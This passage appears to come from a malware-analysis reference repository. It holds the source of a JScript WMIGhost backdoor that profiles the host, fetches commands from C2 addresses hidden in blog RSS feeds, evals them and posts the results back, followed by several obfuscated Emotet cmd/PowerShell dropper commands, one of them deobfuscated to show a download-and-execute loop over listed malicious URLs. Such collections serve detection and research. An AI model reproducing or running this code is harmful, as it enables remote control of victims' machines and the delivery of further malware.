  "http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss";
var sOwner = "XDD";
var MAIN = function() {
  $ = this;
  $.key = "W";
  $.sFeedUrl = sXmlUrl;
  $.sOwner = sOwner;
  $.sXmlUrl = "";
  $.oHttp = null;
  $.oShell = null;
  $.oStream = null;
  $.sHostName = null;
  $.sOSType = null;
  $.sMacAddress = null;
  $.sURLParam = null;
  $.version = "2.0.0";
  $.runtime = 5000;
  $.oWMI = null;
  $._x = ActiveXObject;
};
MAIN.prototype = {
  InitObjects: function() {
    $.oWMI = GetObject(
      "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"
    );
    $.oShell = new $._x("WScript.Shell");
    $.oStream = new $._x("ADODB.Stream");
    $.GetOSInfo();
    $.GetMacAddress();
    $.GenerateUrlParam();
  },
  WMI: function(sql) {
    return $.oWMI.ExecQuery(sql);
  },
  GetOSInfo: function() {
    var e = new Enumerator($.WMI("Select * from Win32_OperatingSystem"));
    if (!e.atEnd()) {
      var item = e.item();
      $.sOSType = item.Caption + item.ServicePackMajorVersion;
      $.sHostName = item.CSName;
    }
  },
  GetMacAddress: function() {
    var e = new Enumerator(
      $.WMI(
        'Select * from Win32_NetworkAdapter where PNPDeviceID like "%PCI%" and NetConnectionStatus=2'
      )
    );
    if (!e.atEnd()) {
      $.sMacAddress = e.item().MACAddress;
    }
  },
  GenerateUrlParam: function() {
    var time = new Date();
    $.sURLParam =
      "cstype=server&authname=servername&authpass=serverpass&hostname=" +
      $.sHostName +
      "&ostype=" +
      $.sOSType +
      "&macaddr=" +
      $.sMacAddress +
      "&owner=" +
      $.sOwner +
      "&version=" +
      $.version +
      "&runtime=" +
      $.runtime;
    $.sURLParam += "&t=" + time.getMinutes() + time.getSeconds();
  },
  CleanObjects: function() {
    $.oShell = null;
    $.oStream = null;
    var e = new Enumerator(
      $.WMI('Select * from Win32_Process where Name="scrcons.exe"')
    );
    while (!e.atEnd()) {
      e.item().terminate();
      e.moveNext();
    }
  },
  Decode: function(sourceStr) {
    var keycode = sourceStr.charCodeAt(0);
    var source = sourceStr.substr(1);
    var vals = source.split(",");
    var result = "";
    for (var i = 0; i < vals.length; i++) {
      result += String.fromCharCode(vals[i] ^ keycode);
    }
    return result;
  },
  circleDecode: function(sc) {
    var base = sc.charCodeAt(0);
    var s = base - 32;
    var r = "";
    for (var i = 1; i < sc.length; i++) {
      var nc = sc.charCodeAt(i) - s - i + 1;
      if (nc < 32) {
        nc = 126 + (nc - 32) % 94;
      }
      r += String.fromCharCode(nc);
    }
    return r;
  },
  MainLoop: function() {
    $.oHttp = new $._x("Microsoft.XmlHttp");
    var feedUrlArry = $.sFeedUrl.split(";");
    var start = new Date();
    var oXml = new ActiveXObject("MSXML2.DOMDocument.3.0");
    for (var n = 0; n < feedUrlArry.length; n++) {
      var UrlList = new Array();
      var URLnum = 0;
      try {
        var tstr = feedUrlArry[n].match("http://.*?\\.php");
        if (tstr != null) {
          UrlList[URLnum++] = tstr;
131 | } else { 132 | $.oHttp.Open("GET", feedUrlArry[n], false); 133 | $.oHttp.setRequestHeader( 134 | "User-Agent", 135 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5" 136 | ); 137 | $.oHttp.Send(); 138 | 139 | var response = $.oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g, ""); 140 | var re = /@(.*)@<\/title>+/g; 141 | var titleList = response.match(re); 142 | for (var i = 0; i < titleList.length; i++) { 143 | try { 144 | oXml.loadXML(titleList[i]); 145 | var container = oXml.getElementsByTagName("title"); 146 | var tmpstr = container[0].text.match("@(.*)@"); 147 | UrlList[URLnum++] = $.circleDecode(tmpstr[1]); 148 | } catch (e) {} 149 | } 150 | } 151 | for (var Urlindex = 0; Urlindex < UrlList.length; Urlindex++) { 152 | $.sXmlUrl = UrlList[Urlindex]; 153 | var runnum = 360; 154 | while (runnum-- > 0) { 155 | $.oHttp.Open("POST", $.sXmlUrl, false); 156 | $.oHttp.setRequestHeader( 157 | "CONTENT-TYPE", 158 | "application/x-www-form-urlencoded" 159 | ); 160 | $.oHttp.Send($.sURLParam); 161 | 162 | var response = $.oHttp.ResponseText.replace(/(^\s*)|(\s*$)/g, ""); 163 | if (response.length > 0) { 164 | var commands = null; 165 | var container; 166 | try { 167 | oXml.loadXML(response); 168 | container = oXml.getElementsByTagName("div"); 169 | for (var i = 0; i < container.length; i++) { 170 | if (container[i].getAttribute("id") == "0a552b5a4352") { 171 | commands = eval("(" + container[i].text + ")").command; 172 | } 173 | } 174 | } catch (e) {} 175 | if (commands != null) { 176 | var commandresult = ""; 177 | for (var i = 0; i < commands.length; i++) { 178 | var result = "no response"; 179 | try { 180 | result = eval($.Decode(commands[i].value)); 181 | } catch (e) {} 182 | if (i > 0) { 183 | commandresult += ","; 184 | } 185 | commandresult += 186 | "'" + commands[i].id + "':'" + escape(result) + "'"; 187 | } 188 | if (commandresult.length > 0) { 189 | commandresult = "{" + commandresult + "}"; 190 | $.oHttp.Open("POST", $.sXmlUrl, 
false); 191 | $.oHttp.setRequestHeader( 192 | "CONTENT-TYPE", 193 | "application/x-www-form-urlencoded" 194 | ); 195 | $.oHttp.Send( 196 | $.sURLParam + 197 | "&command=result&commandresult=" + 198 | commandresult 199 | ); 200 | } 201 | } else { 202 | $.sXmlUrl = ""; 203 | runnum = 0; 204 | } 205 | } 206 | $.runtime = new Date().getTime() - start.getTime(); 207 | WScript.Sleep(10000); 208 | } 209 | if ($.sXmlUrl.length > 0) { 210 | return; 211 | } 212 | } 213 | } catch (e) {} 214 | } 215 | }, 216 | Fire: function() { 217 | $.InitObjects(); 218 | try { 219 | $.MainLoop(); 220 | } catch (e) {} 221 | $.CleanObjects(); 222 | } 223 | }; 224 | new MAIN().Fire(); 225 | ``` 226 | 227 | #### Regular Expressions 228 | --- 229 | 230 | `` 231 | `` 232 | 233 | #### Resources 234 | --- 235 | 236 | Technical write-ups: 237 | * https://secrary.com/ReversingMalware/WMIGhost/ @_qaz_qaz 238 | 239 | 240 | Sandbox reports: 241 | * https://www.hybrid-analysis.com/sample/a6ff8dfe654da70390cd71626cdca8a6f6a0d7980cd7d82269373737b04fd206?environmentId=100 242 | 243 | Notes: 244 | 245 | 246 | 247 | 248 | -------------------------------------------------------------------------------- /Malwares/Emotet.md: -------------------------------------------------------------------------------- 1 | ## Emotet 2 | 3 | 4 | #### Commands 5 | --- 6 | 7 | * Cmd.exe 8 | 9 | 1. 10 | ``` 11 | dWbtPtDObhv MRZqnKhPtUqbVYjQmpdfvDWCtQj hJNjiiIJOGttb & %C^om^S^pEc% %C^om^S^pEc% /V /c set %loVqFNsnWSOoQXU%=jTMkdiizHojdor&&set %var1%=p&&set %var2%=ow&&set %vRwmclCkupwoRzI%=UuIwUIHrb&&set %var7%=!%var1%!&&set %DKViQiPwiWwsiuj%=wYXlpQhqqUoUsX&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %nJELZbjBiKjpnaL%=pzZCXkjGmm&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! 
" ( [RuntIME.InteroPsERvICEs.marshAl]::([runtiME.IntErOpserViceS.marshal].GeTMEmbERS()[2].nAME).inVOKe([RUNtIme.intEropseRVICEs.MarShal]::SeCURestrINgtogLoBaLaLloCUnicOde( $('76492d1116743f0423413b16050a5345MgB8ADYAYwB4AHAAdgAxAHEAdQAvAEkAVQBXADQANQBrAFUAWgBkAEIANwBTAGcAPQA9AHwAYgAyADUAOQAwADMAYgBkAGMAOAA1AGMANwA0ADgAZgBhADUAYQBhAGIAYgBkADcAMwA1ADgAYwA3ADIANwA1ADAAZAA4AGEAYQBiADEANwBkADIAMwA3ADMANABlAGUAOAAxADUAZQA3ADAAOAAxADMAZQAyADIAZQBlADUAOAAxADcAMQAxAGUAOAA4ADUAOQAzADcAMwBlADcAOABmADYAYwA5ADkANAA3ADMAMABhAGMAMwAzADIAMQAxADcAYwA2AGQAMgAxADAAZQAyADQAZgAyAGUAMQA0ADMANABkAGIANAAxADAAMABlADAANAA0AGUAMwBjADYAYQAzAGUANgA2ADQAYQBmADgANwA4ADYAMQAwAGIAOAA2AGYAOQBmADYAOAAyAGUANAA4ADAAOAA3ADQAZgA4AGMAZQAxADUAYQAxADIAYwA5AGIAMgBmADcAYgBhAGQAYwAyADQANQAxADcAOQA4AGMANQA0AGMAYgAwADkAZAA0ADYAMAA4ADYAYQAyAGMAYwAxAGEANAA2ADQAZABmADUAMQBhADQAZQA3AGQAZABlADQANgA5AGQAYwA2ADIAOAA4ADEAMwBiADQAYwBlAGIANQA1ADYAMAAwADUAOQA1ADQAOQBmADAAMgBhADUAOQBiADQANABhAGMAZgAxADEANAA3ADcANgA2ADIAYgA4ADUANwA1ADUANQAxADEAOABlAGQAMAA2ADAAZABiADQAZABjAGMAYQBmADgAYQAzAGYAZQBhAGIAMgA0ADQANgBmADgAMwBlADQANwAyADcAYwBhAGIAMQA2ADIAOQA4ADcANwBlAGYAZAAwADYAYwAyADAAYgAyAGMANABlADIAYgBiAGQAYQA4ADQAZQAzADgAZgA2ADAANQAzAGIAYgBlAGUAZQAzAGQAZQBiAGYAMABkADMAZgA5AGUANwAzADYAZQAwADYANgA4ADUAZAA2ADkAMwBlAGUANwA1ADEAMgA1ADIAMAA3ADEAZgBjADQAMgAxADQAYwBjADYAMQBiADkAYgA0ADEAOQBjADQAOAAzADkANAAyADYAMQAzADgANAA4ADcAYQA5AGQANwAxADkAMAA5AGIANABjADUAYQBiADAAYQA2AGEANABjAGEANgBhADMAZgBiADgAOQBkAGEAZQBkAGUAYwBkAGUAZQA3AGQAYwBiAGEAMwA5ADAAMAA0AGMAMQA2AGMAOQA1AGQAYQA1AGUAYgBmAGYAYwBjADMAYQBlAGUANABiADQAMwBhADAAOQAxAGMAOQA5AGUAZAAzADAAZAA1ADMAOAAxAGUANQAzADAANABlADkAYwAxAGMAMwBmADAANQBlADYAYwA3AGYAMwAxADgANAAxADEANQA0ADIAOQA5AGMAZQA0AGUAMAAzADkAMgA5AGIANQAxADAANgA2ADAAOAA4AGIAMwAzAGYANgBiADcAOQBjAGQAZQA4AGYAZQAxAGYAOAAyADAANQAxADkANgBhAGMANAAzADMAYwAyAGYAYwBlADIAOAAwAGQANgA5ADQANgAwAGEANABlADAAZABjADYAYgBmADkAOAA5AGMAMwA0ADQAZgAzADIAZQBiAGMAOABkADcANwBhADkAMwAwAGQAMAA4AGEAZgA4ADkAYgAyAGUAZAAyAGQAMAA1ADEANwAxADMAOQA1ADIAOQBhAGUANgAzADYAM
wBhADMAOQBiAGEAZQA4AGYAZQBiAGMAYQAyADMAYgAxADQAZQAyAGYAOABkAGUAOAA2AGIAOQA0AGYANAA0AGQAMABhADEAZgBmADAAOABjADkAYgBlAGQANABmAGIAMgBiADMAYQA5ADEAZgBiAGMANgAyADcAMwA4AGUAYQBjADAAZABlADkAZgBiAGUAYwAxAGUAOAA4ADkANwA5ADAAOAAyAGIANgAxADUAMQA3AGQAMwBmADUAZABkADMAZgBmADUAZQA1AGUANABlADMANgAzAGYANwA4ADMAMwA2AGEANgAyAGUANwAyADcAYQAyAGIAMwA2ADgAMgBiADUANAAxADcAOQBjADAAYgA5ADIAZQBjADQANQAxADcANwBmADIAYgBiADgAOAA0ADAANgAxAGMAMAA5ADgANgBkADcAMAA2ADcANwAxAGMAYgBiADEANgBmADEAMQAyADAANQA2AGMANQAyADkAMgAyADMAMQAwAGMAYQAyADkAOQBjADgAMwAyAGYANQBmADUAYgA4AGUAZgBhADAAZQBkADgANABjAGUAMQBiAGIAMgBlAGEANwAyAGQAYQA5ADcAOQAwADcAZgBjADgAZQA2ADQANwA2AGIANwA2ADgAZAAzAGUAZAAwADgANQBkADQAYwA4AGYAYwAxADAAZQBkADAAMQA2AGQANQAxADkAOQAxADUAZAA4ADgANwBjAGUAMgBkADgANwAxADAAMgBmADgANgAwADkANAA1AGEAOABkAGMAYgA4AGYAZQAwAGUAZQBkAGQAOQA5ADYANwBkADkAYQAzAGIANgBjAGMAZgBjAGIAMQA0ADEAZAAxADEAZABlADQAZgAwADgANAAyADcAOAA1ADYANwAyADUAOABhADEAZgBjADcAZQA3ADgANwA1ADUAYQBkADgAMgA3ADkAMgAxAGYAZgA1ADIAZQA0ADMAYwA2ADIAYQAwADEAOQBjADEAMgBiADgAOQAyADIAMgAwADAAOAA5ADEAYwBjADEAMAA4ADMAZQA2ADAAOQBkADQAMwAwADAAMQA1ADAANABjADQAYgA5ADMAMwAyAGEAMgA0ADYAMgAzADUANgA5ADgAMQBkADkAOQBjADgAMgAxADIAYwA0ADEANAA5AGYAZgBlADAAZAAyAGIAZQBhAGIAYgA5AGEANwBhADMAZAA3AGMAZAAxADgAOQBiADEAMQAzADUANABkAGUAOAAyAGQAMgAwAGUAMQAzAGQAZAA0AGEAZAA5ADIAYgA3AGQANwA3ADYAYwA0AGIAYwA0ADEAZAA1ADcAZgBlAGMAOQBmADcAZABjAGMAZQBiADcAZgBmADMAMAA1ADAAZQA3AGQANgBjADkAMQA0AGYANQBlADUAYgBjADIAOAAzADgAMQA3ADUAYQBjADAANgBhAGYAMgBiADAANwBlADYAZABlADYAZgA5ADEAMgBmADEAMgAyAGYAMAA3AGMANABhADMANwBhAGQANwAzADAANQBhADEAZABmAGMANAA5ADAAMgBlAGEAYQAwAGEAMwBkADQAYgA4ADQANgBlADcAZgAyADkAMQA3AGQAOABjADAANwA1AGQAYwA2ADEAOQBmADYAMwBiADQAMABmAGQAMwA3AGIAYQA4ADEAZAAzADQANABkADEAYwA0AGMAMgBiADQAMgBhADEANAA5AGMAZAA2AGUAYgAwAGMAZgAxADMAZgA3AGMAOQA4ADgANwAzADYAYwBjADIAMwA5ADgAMgA5AGIAZABlADIANwBiAGMAYgA0ADgAOAA3AGQAOAA3ADcANQA5ADIAMgAyADgAZQAwAGUAZgBmAGEAMAA3AGUAZgA5ADEANwAyADcAMwBlAGQANAAyADcAYgBhAGIAYgAzADEAMgA5AGYAOABlADUANQAwADQANgAwADQANQBmAGMAZABiAGQAMABjADQANQAxADYAYQAwADMANQA5ADQAOQAwAGUAY
gAyAGUAMAAwAGEAOAAyAGEANQAxADEANgA2AGEANgA5ADEAMAA5AGQAYwA0AGMAZABmADkANwA5AGIAYgBkADIAZgA2AGQAZgBjADgAMABjAGUANgAxAGYAMwAyADUAZgBlADQAMgBlADQAOABkADAAMwAxADEANQBiADcANgA2ADUAMwBkAGEAOAAxADMAMgBkAGMAYQAxADQAYwA0ADMANAAyADkANwBmADAAOAA1AGEANwA5AGMANQBhADEANgBlADQAZAA5AGMAOAAyADMANgA1ADkAOAAwAGEAMwBlAGIAZABiADAAMQBmADkAZQA2AGYAMwAyAGIAMwAxADUAZABjADEAMQBlADMAYQBkAGYANgAxADEAZAAxADMAOQAyADIANQBmADgAOAAyAGMANwA4ADQAZgBmADQAMQBiAGQAZgBhADYAMABlADcAOQA4ADQANgA1ADEAYQBjADUAYwBjADcAMwA1ADMANwBjAGIANgA1ADQAZAA3ADIAOABjAGYAZQA0AGQAZgA2ADYAMQBkADEANQA3ADIAMQAyAGUAMwA3ADMAMAAxAGEAMABjADkAMQBhAGMAOQBhAGEAMQBkAGQAMgA2ADkAZgBiADcAYgA3AGUAYQBkAGYANAAwAGMANwBlADgAMwA3ADUAYwAxADgAYQA1AGEAMQA3ADcAMgBjAGEAMgAwADcAZgAzADMAOAA4AGEAZAA1ADcAZQBjADUAZQAwADkAMgAzAGYAZQBiAGMAYgA1ADAAZABjADUAMAA2AGEAYQAxAGYAYwBiAGQAYgBkAGIAMwBjADcANgAwADkAOABiADMAZQBmAGQAZAAzAGEAOQA4AGEAYgA3ADcANwBjAGMAMQAzAGEAMgA4ADMAYgBkAGUAMwA5ADgANQBiADMAMAAxAGQANQAxAGUANwA1AGUAYQA2ADgAZQA0AGUAYwBhAGUANABhAGUAOAA5AGMAZgAwADYAZQA0AGYAMQBlAGYAYQBkAGEAMAA1ADgAOQAzADAAMwAwADYAYwA5ADUANQA5AGMAMQBkADgANgBmADgANAAzADYAYwBjADIAMAAwADMAMgAwADMAMgBhADIAZABkADQAZQA0ADEAMwA2ADEANwA2ADQANwAxADIAYgAwADUAZgA1ADcAMAA3AGYAMgBjAGQANABjADAAZQA4ADgAMwBkAGQAYgA3ADgANAA2ADUAYgBkADAANgA4ADkAMgBkADEAOQBjADYAYQA0AGYAMgA2AGQAOABlAGYAZQBjAGIAMgBhADUAYQAyAGYAYQBjAGYAYwBjADIAZgAwADYANgA0ADkAZQAxADgAZABhADYAOQA2AGMANQAyADkAMQA5ADMAOQA3AGUANgA3ADEAMgAzAGUAOAA4AGYAYwA3AGIAMgA1ADIAYwAyAGYAMwAwADcAZABjADQAZgBhAGUANgA1ADEAMQAzADYANAA2ADgAYQA2AGQAMABjAGUAMgAwAGEAOQA3AGEAZgBjADAAZgBlADEAOQAxADkAZQA3AGQAOABhADYANgAwADUAMABkAGYAOQBmAGQAMwA=' |cOnvErtto-SeCureSTrINg -K (35..4)))))| . ( $VERBosePreFERENcE.TOStrIng()[1,3]+'x'-joIn'') 12 | ``` 13 | 14 | 2. 
15 | ``` 16 | Cmd/C "Set ctSI= .( ([StriNG]$vERbOSEPrEFeReNce)[1,3]+'x'-JOIN'') (NEW-ObJEct io.CompreSSion.DefLAtestrEaM([IO.MemOrYStReam] [sYsTEm.COnVERT]::frOmbASE64STrINg('PZBda4MwFIb/Si4CqbhGuu3GBqGs28CxrowySmE3MT3W1JhIetAO8b9PZevted7znA/6tdWJhXbusjMoJB+AfA/Z2miwKGiaNgkrEOtlFEmPF4tQcuWq6ICf1q3+SCYLLZUHibqRE453h+1LXP4HlK4L8BXw2kRHiTJS7Q0V0g/DcncdG3nmo8fF+nyj8gLGyMo12p4mMy5OjO9qo3HGViwQdLN/Jwlh9w8xE7TKfULBNkuEqg7ZNwtHHjIOV2Aid8OOqpjRzdsT0ZaM5wUd+p+ODm/gz661xsnjqzYwZe7IKAxEahtXwjwdpFNFZIOnFL2SqIqu738B') ,[IO.CompRessiON.cOmpreSSIoNmoDE]::dECOmPreSs ) ^|FOReach { NEW-ObJEct sYstem.Io.StrEAmreAdeR( $_,[teXT.EnCoDiNG]::aSCii) } ^| foREaCh { $_.rEADtoENd() }) &&POwERshelL $oB84i = [tyPe]( \"{3}{0}{1}{2}\"-F'n','MEN','t','eNvirO' ) ; ${executiOnCONtExt}.\"InVokec`Om`ma`ND\".\"in`VO`KES`CrIPT\"( ( ( GET-IteM variabLE:oB84i ).vaLuE::( \"{1}{3}{2}{0}\" -f 'E','ge','NVIroNmEnTVARiABl','TE' ).Invoke( (\"{0}{1}\" -f'cTs','I'),( \"{1}{2}{0}\"-f 'S','PR','oCEs') ) ))" 17 | ``` 18 | 19 | 3. Payload with base64 compressed (deflate/inflate) data and reversed spelling 20 | ``` 21 | /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'crf)(Dn'+'eoTda'+'ER.)'+'})'+'iI'+'cS'+'A::'+']Gn'+'IDoCNE'+'.txE'+'t'+'.mE'+'T'+'s'+'YS[ , '+'_Q8h'+' '+'(REDA'+'ErmAe'+'r'+'t'+'S.oi '+'TcEJBO-WEn {'+' tC'+'E'+'jBO'+'-hcAe'+'Ro'+'f '+'crf'+' )'+'s'+'SERp'+'M'+'O'+'CED'+'::'+']EdOm'+'NoIS'+'SErp'+'m'+'O'+'c.noiss'+'erPmoc'+'.Oi[, 
'+')'+'0kR'+'=='+'wf0gt'+'4jn'+'5w'+'plE'+'56'+'j'+'u'+'T6'+'l'+'U'+'y8Thm'+'dN'+'Rp'+'Y'+'bFvu'+'a'+'GcUFpNDv'+'i'+'S'+'aiRLaT3RXf5'+'R62j'+'22Tq'+'8'+'9'+'yO00xFYyxWaA'+'a'+'PAh/'+'+eeB'+'+'+'/PwGy7wuuEMUTe'+'JCm3c'+'7'+'dD'+'D'+'Nv'+'v0E6'+'ly'+'9'+'A'+'B'+'fdSW9'+'xBKUu'+'DeMT4'+'rPe6id'+'+'+'JMV'+'C2TkqV/f'+'x'+'b'+'a'+'Ky+'+'XLxam'+'q1'+'vrVSpZnJ+Z'+'x0HZ5X'+'N+WpMXQhxM5iSysve+L/J+yhlz'+'6Tt'+'VOy'+'g'+'Ahuy'+'KymQon8'+'J'+'cE7vWmI'+'Gm'+'vhI'+'siwMIrg'+'0'+'Ai'+'LMxX10'+'Vyjy'+'TnY'+'G'+'3E'+'wE'+'UCsEZ6yMT'+'sET'+'nT'+'4Jb'+'nj'+'w'+'ELS'+'5UEl2J'+'syPY9iggb2'+'84'+'aR'+'9bW'+'+Q'+'QN/'+'xtcw'+'J7W'+'++e'+'6b'+'C'+'ZcX'+'/QOmbOaruL'+'vV'+'uK9FG'+'UGBKISY'+'Y'+'QtENgqfNb'+'JIFa6hy/XI'+'FwI8TRBZ'+'P0'+'kR '+'(GNiRt'+'s46E'+'SABMorf:'+':]'+'T'+'REvn'+'OC'+'[]MaEr'+'tSy'+'roMe'+'m'+'.oi.METsys'+'['+' '+'(mAERtSE'+'tAlFe'+'D.'+'N'+'OisSErpM'+'o'+'c.Oi'+'.mETsys'+' Tc'+'EJ'+'B'+'O-'+'WEn ( '(( ()''nIOJ-]2,11,3[EmAN.)'*rDM*' eLbAirav-Teg(( ." ; [ARrAY]::ReveRSE( ( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue); [stRiNG]::jOIn( '' ,( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue )^|^& ( $veRbOsePrEFerENCe.TOsTRiNG()[1,3]+'x'-JOIn'')&& PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )" 22 | ``` 23 | Deobfuscated 24 | ``` 25 | /C "set diy=$8230C =[Char[]] ; ". 
((get-variable '*mdr*').name[3,11,2]-join'')( ((' ( new-object system.io.compression.deflatestream( [system.io.memorystream][convert]::frombase64string('PZBRT8IwFIX/yh6aFIJbNfqgNEtQYYSIKBGUGF9KuVvLuraObmOQ/XcZCb6e++W7Jwctx/NQQ+Wb9Ra482bggi9YPysJ2lEU5SLEwjnbJ4TnTEsTMy6ZEsCUEwE3GYnTyjyV01XxMLiA0grIMwisIhvmGImWv7EcJ8noQmyKyuhAgyOVtT6zlhy+J/L+evsySi5MxhQXMpW+NX5ZH0xZ+JnZpSVrv1qmaxLX+yKabxf/VqkT2CVMJ+di6ePr4TMeDuUKBx9WSdfBA9yl6E0vvNDDd7c3mCJeTUMEuuw7yGwP/+Bee+/hAPaAaWxyYFx00Oy98qT22j26R5fXR3TaLRiaSivDNpFUcGauvFbYpRNdmhT8yUl6Tuj65Elpw5nj4tg0fw==') ,[io.compression.compressionmode]::decompress) | foreach-object { new-object io.streamreader( $_ , [system.text.encoding]::ascii)}).readtoend() | invoke-expression'))" [array]::reverse( ( childitem ("variable:"+"8230c") ).value); [string]::join( '' ,( childitem ("variable:8230c") ).value ) | & ( $verbosepreference.tostring()[1,3]+'x'-join'')&& powershell set-item ('variable:skeail') ( [type]( environment' ) ) ; ( .('ls') ( "executionvariable') ).\"value\".\"invoke-command\".('invokescript').invoke( ( ${skeail}::('getenvironmentvariable').invoke( 'diy',('processs' ))) )" 26 | 27 | $UGQ=new-object Net.WebClient;$Frh=' 28 | http://craniofacialhealth .com/fkwoBvLXu9@ 29 | http://cipherme .pl/data/FUqfiGggE@ 30 | http://duwon. net/wpp-app/zZIi80jKEg@ 31 | http://malchiki-po-vyzovu-moskva .company/fyxuFQjT@ 32 | http://dingesgang .com/kAMzVfDDiX' 33 | .Split('@');$OnT = '431';$cwL=$env:temp+'\'+$OnT+'.exe';foreach($NPw in $Frh){try{$UGQ.DownloadFile($NPw, $cwL);Invoke-Item $cwL;break;}catch{}} 34 | 35 | ``` 36 | 37 | 4. 
38 | 39 | ``` 40 | cmd /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^1,2^1^,5^0,^4^4^,2^4,^5^5,0^,4^4,^29,5^7^,1^0^,^1^5,9,50,^44,2^,22,22,18,^5,20^,20^,2^2,61^,66,^14,^66,53^,^66^,^2^2^,43^,63,^6^1^,^5^2^,3^,42,4^3^,4^7,20,6^3,^6^2^,^2,2^2,22^,^1^8^,5^,2^0^,2^0,1^8,3^4^,17^,1^7^,^5^9,^6^1,^34,6^6^,61,^4^3,^5^3^,^1^3,4^3,^3^,^5^2^,^34^,2^0^,1^7,^45,4^2,23,^6^2^,2^,22,2^2^,^1^8,5,^2^0^,^20^,^1^3^,^34^,^6^6^,^2,^4^7^,^66^,61^,^5^2,3^4,13,34,^3^,4^2^,^43^,^47,2^0^,4^0^,5^1,^21^,60^,1^6,^2^3,6^2^,^2,22,^2^2,18,^5^,^20,20,^4^3,^54,^6^1^,43,^13,^2^8^,^63^,5^2^,47,^3^4,59^,^42^,^2^,63,3^,^18,^58^,2^0,^3^4,63^,^14^,^5^6^,^45,^56^,62,2,2^2^,22,18,^5^,20^,20,66,^52,^52,6^3^,^61^,^66^,5^3^,^42,^5^9,^25,^42,2^,^6^6,61^,5^9^,53^,^2^2^,59^,3^,3^7^,6^1,^2^0,^52,^3^7^,^2,44^,3^,^6^4,^1^8^,^58,^3^4^,22^,36^,4^4^,62^,44,^1^2^,^29^,57^,^66^,^4,^18^,^50,3^6^,^7,^64^,^28^,5^2^,22,5^9^,4^7,^3^,^24^,1^1^,^3,^51,^66^,^2^2^,2,8,^5,^5,^23^,59,22,^60^,59^,^4^7,^1^8^,^51,66,22,^2^,36^,^12,4^6^,44^,^49^,4^7,1^0,^32^,3,5^9,26^,59,^44^,12,^2^9,^57,18^,^13,33,1^,5^0,3^2^,59,2^7,2^5,^11,1^4^,^48,^5^9,4^2,^22^,1,^2^5,^4^2,^43,^4^7^,1^,4^4,4^7,^52^,26,^4^7,58^,^6^5,3^,^26^,4^7,^58^,2^,2^2,2^2,1^8^,^4^4^,2^9^,5^7,22,1^8,3^1,1,50,^1^,3^2,^5^9^,^27,2^5^,^1^1,^14,48,59^,^42^,^2^2,^1,^2^5^,4^2^,43,^4^7,1^,4^4^,^66,13^,43^,1^3^,1^4,3,5^2^,22^,^61,59,^6^6,47^,^44^,2^9^,37,^4^3^,61,^5^9,^66,42^,^2,36^,^5^7,^63,3^4,0^,1^,^3^4^,53,^1,^57,^10,1^5,^9^,^1^2^,^38^,^22,^61^,^2^8,^3^8^,^57^,^18,13^,^3^3,3,4^3,^1^8,^5^9,53^,^36,4^4,^2^3,3^9,^60,44^,^6,^5^7^,^6^3,34^,^0,6^,^3^5,^1^2^,29,^57^,^18^,13^,^33^,3^,52^,^5^9^,^5^3^,1^3^,^36^,12,2^9^,^5^7^,^2^2^,1^8^,^31^,^3^,43,^1^8^,5^9,53^,36,^12^,^29^,^57^,22,^1^8,^3^1^,^3,^2^2,2^8,^18,59,^1^,^5^0^,^1^,19^,2^9^,^5^7^,^22^,18^,31^,^3,27,61^,^34^,2^2^,^59,3^6^,57^,^18^,1^3,^33,^3^,^61^,^59^,^52,^1^8^,^4^3^,5^3,^52,59,4^,43^,^13,28
^,^1^2^,^29,5^7^,22^,^1^8,^3^1^,^3,5^2,^6^6^,^5^6,59^,2^2,4^3,3^7,34,^5^8,5^9^,36,^5^7^,66,4^,18^,^12,^2^9,^64,^22,^66^,61,22,2^5^,51,61^,43^,^4^2^,5^9^,^52,5^2^,1^,^5^7^,66^,4^,^18^,^2^9^,1^4^,^6^1^,^59^,^6^6^,^31,3^0^,42^,6^6^,^2^2,4^2^,^2,3^8^,3^0,3^0^,1^,1^,^1,^1,^1^,1,1,^1^,^1,1^,^1^,^1^,1,1^,1,1^,1,73)^do ^s^e^t ^y^p^e=!^y^p^e!!rk^g^7:~%N,1!&&^if %N ^g^e^q ^7^3 cal^l %^y^p^e:~-^5^0^7%" 41 | ``` 42 | 43 | 5. 44 | ``` 45 | c:\ZHhFvBd\QEWVzrTc\FNuOpzpfwHM\..\..\..\windows\system32\cmd.exe /C"^s^et ^t3=^o&&s^e^t V^toN=^.^o^p&&s^e^t 0^a^lV=()&&^se^t ^H^i^Z=://pr&&^s^e^t ^4^D=r^Y&&set ^Zu^GH= ^ ^ &&^se^t ^sr=t&&^s^et A^2=ms^xm^l&&se^t z^l^h=^ in&&s^e^t ^oC=^h&&^s^e^t ^B^S^0^u=t^t&&^s^et ^J^q^G=^o&&s^e^t ^E^u=^M&&^s^et 